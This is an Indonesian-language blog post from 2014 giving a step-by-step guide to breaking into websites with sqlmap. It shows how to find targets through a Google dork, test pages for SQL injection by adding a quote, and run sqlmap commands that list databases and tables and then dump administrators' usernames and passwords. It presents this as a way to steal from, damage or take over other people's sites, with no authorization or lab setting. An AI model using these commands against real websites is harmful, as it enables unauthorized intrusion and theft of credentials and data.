Saturday, 7 June 2014

CARA HACK WEBSITE MENGGUNAKAN SQL MAP

Selamat siang sahabat blogger, siang ini saya agax bingung ingin membahas apa.. namun dapat ide lagi hehe... berdasarkan pengalaman saya berguru ke bang Rextor Haxor [ Privasi ]. Alhamdulillah mendapatkan berbagai cara untuk mengetahui lebih dalam mengenai sistem keamanan jaringan..
Bagi pada hacker, cracker, cyber maupun anonymous. Hal ini tentu saja sudah sangat familiar dikalangan mereka, bahkan sudah menjadi makanan sehari-hari. Ada banyak cara untuk membobol maupun hack dari sebuah website.. nah kali ini kami akan sedikit sharing mengenai cara hack website menggunakan sql map.
Dengan mengetahui password maupun username dari sebuah website, kita tentunya akan dengan leluasanya mengendalikan website target tersebut.. kita dapat mengambil, menyebarkan, merusak, maupun mengambil alih kendali.

OS yang banyak digunakan para cyber, maupun hacker untuk membobol biasanya banyak menggunakan BackTrack, Kali Linux, dan lain-lain. yukk langsung ke TKP...

Langkah-langkah hack Website Menggunakan SQL Map dengan BackTracx 5 r3:
1. Cari Target Dengan Menggunakan Google Dork
untuk melihat lengkap kami sudah menyediakannya untuk pencarian menggunakan google dork, copy'kan code seperti inurl:gallery.php?id= tersebut ke google, namun kami sarankan untuk tidak ke new tab, namun langsung ke pencarian google.
Silahkan lihat cara-caranya disini:
  Google Dork 
  Backup Google Dork 

2. Cari Website yang Vuvln, karena tidak semua website itu vuvln. dalam hal ini, biasanya kita menggunakan cara untuk melihat ID dengan menggunakan google dork yang sudah dicari tadi, contohnya seperti ini: inurl:gallery.php?id=
Untuk mengecheck apakah website itu Vuvln atau tidak, kita sisipkan tanda petik ( " atau ' ) pada bagian akhir nomer id'nya.. Contohnya: http://www.nama_web.org/gallery.php?id=1"

Jika terdapat error kurang lebih seperti gambar diatas, maka kemungkinan website tersebut vuvln.

3. Buka Console [ Terminal ]
Kemudian Ketikkan: cd /pentest/database/sqlmap    [ Enter ]
Kemudian Ketikkan: ./sqlmap.py -u http://nama_website.org/gallery.php?id=1  --dbs
[ Tergantung yang dicari ], [ --dbs untuk melihat nama database'nya ]
Contohnya Seperti gambar dibawah ini:


4. Mecari table database'nya dengan perintah --tables atau --table
Gambar dibawah terdapat 2 nama database'nya, yaitu information_schema dan nubriorg_db.
Kemudian terserah kita mau melihat bagian yang mana, namun contoh dibawah kami membuka nama database yang bernama nubriorg_db.
Dengan mengedit bagian akhirnya menjadi seperti ini:
./sqlmap.py -u http://nama_website.net/gallery.php?id=1 -D nubriorg_db --table


5. Mencari Kolom username dan password target.
Setelah kita mendapatkan nama dari database tadi. Kemudian kita pecah lagi pada bagian admin [ bagian vital'nya ] Dengan mengetikkan:
./sqlmap.py -u http://nama_website.net/gallery.php?id=1 -D nubriorg_db -T admin --columns


6. Melihat nama dan password admin.
Setelah proses diatas dilalui, maka kita akan mendapatkan hasil seperti gambar dibawah ini. Kemudian kita lihat nama dan password dari admin tersebut dengan mengetikkan:
./sqlmap.py -u http://nama_website.net/gallery.php?id=1 -D nubriorg_db -T admin --dump


7. Waktunya Eksekusi.
Jika ada perintah untuk memilih Yes or No, Kita pilih: Y ,Seperti contoh dibawah ini. dan kemudian kita tunggu sampai proses'nya selesai.


8. GAME OVER..!!!
Selesai sudah...dan kita dapat bebas mau diapain itu website.

1 comment:

  1. Gan saya punya misi untuk menghancurkan situs porno. gan boleh minta pin bbmnya agar saya bs belajar dr master langsung

    ReplyDelete

Jasa Instal Ulang

Di daerah Bandung deket Gazibu depan Pusdai Hanya 50 Ribu full sama software yang di mau +Driver tambah 25 Ribu (Quota Mahal Bro). Bisa Hubungi saya di ChatBox di kanan blog atau Facebook, No : 083822457942 dan Twitter